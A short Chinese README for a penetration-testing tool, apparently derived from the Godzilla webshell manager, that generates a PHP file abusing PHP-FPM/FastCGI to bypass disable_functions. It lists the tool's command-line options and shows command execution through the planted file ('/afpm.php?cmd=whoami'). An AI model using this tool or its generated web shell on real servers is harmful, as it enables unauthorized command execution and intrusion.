写这个工具主要是因为渗透测试中遇到一些极端的环境无法使用shell管理器连接,就不能直接使用工具中自带的Disable_functions bypass工具,而Fpm bypass最为常用。
该工具是直接从哥斯拉中copy+魔改出来的。为了应对各种环境,可通过工具生成php文件后再二次修改。
$ java -jar FuckFpm.jar
错误: 缺少必需参数!
缺少的参数: [o, h, b, p]
usage: Main -b <arg> -h <arg> -o <arg> -p <arg> [-q]
程序说明:这是一个命令行工具,需要提供以下必需参数:
-b,--bin <arg> 位数 (86 或 64)
-h,--host <arg> host (unix:///tmp/php-cgi-70.sock 或 127.0.0.1:9000)
-o,--os <arg> 操作系统类型 (linux 或 win)
-p,--path <arg> 临时文件路径
-q,--help 显示帮助信息
使用示例:Java -jar FuckFpm.jar -b 64 -h 'unix:///tmp/php-cgi-70.sock' -o linux -p '/tmp/'
利用:/afpm.php?cmd=whoami